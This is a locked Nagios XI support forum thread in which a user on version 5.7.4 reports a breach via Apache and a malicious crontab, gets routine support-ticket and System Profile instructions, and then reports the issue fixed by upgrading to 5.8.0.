NagiosXI is VULNERABLE

This support forum board is for support questions relating to Nagios XI, our flagship commercial network monitoring solution.
Locked
dslaughter
Posts: 128
Joined: Wed Feb 20, 2019 3:46 pm

NagiosXI is VULNERABLE

Post by dslaughter »

I had a breach this morning that specifically targeted nagiosxi. I've managed to get some of the source of the command dropped. They got in through apache and setup a crontab to download and run their script. My nagiosxi has been taken offline. Please advise what to do next?
dslaughter
Posts: 128
Joined: Wed Feb 20, 2019 3:46 pm

Re: NagiosXI is VULNERABLE

Post by dslaughter »

I've captured the source but haven't posted. I thought you would like me to pm since the ip addresses its attacking are in there.
dslaughter
Posts: 128
Joined: Wed Feb 20, 2019 3:46 pm

Re: NagiosXI is VULNERABLE

Post by dslaughter »

I'm on 5.7.4.
dchurch
Posts: 858
Joined: Wed Oct 07, 2020 12:46 pm
Location: Yo mama

Re: NagiosXI is VULNERABLE

Post by dchurch »

I'd advise you to open a ticket so we can escalate this issue.

You'd save some time getting this resolved if, when you create a ticket, you attach a System Profile zip to the ticket right away. Get one by going to Admin (top menu) => System Profile (in the left menu), then clicking the blue button. If you're unable to generate the the profile through the web interface, please try generating it from the command line by running these commands as root:

Code: Select all

rm -rf /usr/local/nagiosxi/var/components/profile*
/usr/local/nagiosxi/scripts/components/getprofile.sh SUPPORT
The profile we be output to the /usr/local/nagiosxi/var/components/profile.zip file.
If you didn't get an 8% raise over the course of the pandemic, you took a pay cut.

Discussion of wages is protected speech under the National Labor Relations Act, and no employer can tell you you can't disclose your pay with your fellow employees.
dslaughter
Posts: 128
Joined: Wed Feb 20, 2019 3:46 pm

Re: NagiosXI is VULNERABLE

Post by dslaughter »

This is fixed in 5.8.0. I've upgraded and should be ok. You can lock this thread.
scottwilkerson
DevOps Engineer
Posts: 19396
Joined: Tue Nov 15, 2011 3:11 pm
Location: Nagios Enterprises
Contact:

Re: NagiosXI is VULNERABLE

Post by scottwilkerson »

dslaughter wrote:This is fixed in 5.8.0. I've upgraded and should be ok. You can lock this thread.
Locking thread
Former Nagios employee
Creator:
ahumandesign.com
enneagrams.com
Locked